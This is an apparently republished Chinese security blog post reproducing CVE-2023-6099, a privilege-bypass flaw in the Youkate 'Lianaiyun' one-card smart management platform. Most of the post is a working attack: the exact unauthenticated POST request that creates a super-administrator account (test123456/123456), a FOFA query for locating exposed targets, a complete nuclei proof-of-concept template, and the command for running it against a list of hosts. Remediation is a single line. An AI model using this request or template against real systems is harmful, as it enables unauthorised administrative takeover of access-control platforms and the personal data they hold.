免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
优卡特脸爱云一脸通智慧管理平台权限绕过漏洞
02
—
漏洞影响
1.0.55.0.0.1及其以下版
03
—
漏洞描述
脸爱云一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。
04
—
title="欢迎使用脸爱云 一脸通智慧管理平台"
05
—
漏洞复现
向靶场发送如下数据包
POST /SystemMng.ashx HTTP/1.1Host:User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: enContent-Length: 174operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
响应200即成功创建账号test123456/123456
登录后台可以看到拥有管理员权限
证明存在漏洞
06
—
nuclei poc
poc文件内容如下
id: CVE-2023-6099info:name: 优卡特脸爱云一脸通智慧管理平台权限绕过漏洞author: fgzseverity: highdescription: '脸爱云一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。'tags: 2023metadata:max-request: 3fofa-query: title="欢迎使用脸爱云 一脸通智慧管理平台"verified: truehttp:- method: POSTpath:- "{{BaseURL}}/SystemMng.ashx"headers:Accept-Encoding: gzip, deflateAccept-Language: enbody: "operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators"matchers:- type: dsldsl:- "status_code == 200"
运行POC
nuclei.exe -t CVE-2023-6099.yaml -l 1.txt
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):【1day】CVE-2023-6099 漏洞复现 nuclei poc
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论